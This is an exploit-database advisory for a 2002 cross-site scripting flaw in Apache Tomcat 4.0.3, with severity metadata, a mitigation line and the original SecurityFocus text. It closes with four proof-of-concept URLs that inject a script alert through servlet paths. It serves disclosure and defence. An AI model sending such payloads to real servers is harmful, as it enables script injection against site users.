Cross Site Scripting in Apache Tomcat 4.0.3

vendor:

Tomcat

by:

SecurityFocus

7.5

CVSS

HIGH

Cross Site Scripting

CWE

Product Name: Tomcat

Affected Version From: 4.0.3

Affected Version To: 4.0.3

Patch Exists: YES

Related CWE: N/A

CPE: apache:tomcat:4.0.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Microsoft Windows and Linux

2002

Cross Site Scripting in Apache Tomcat 4.0.3

When servlet mapping is enabled, it is possible to invoke various servlets and classes and cause Apache Tomcat to throw an exception. This will make cross site scripting attacks possible.

Mitigation:

Disable servlet mapping and ensure that all input is validated.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5193/info

A vulnerability has been reported for Apache Tomcat 4.0.3 on Microsoft Windows and Linux platforms. Reportedly, it is possible for an attacker to launch a cross site scripting attack.

When servlet mapping is enabled, it is possible to invoke various servlets and classes and cause Apache Tomcat to throw an exception. This will make cross site scripting attacks possible. 

tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.ContainerServlet/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Context/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT>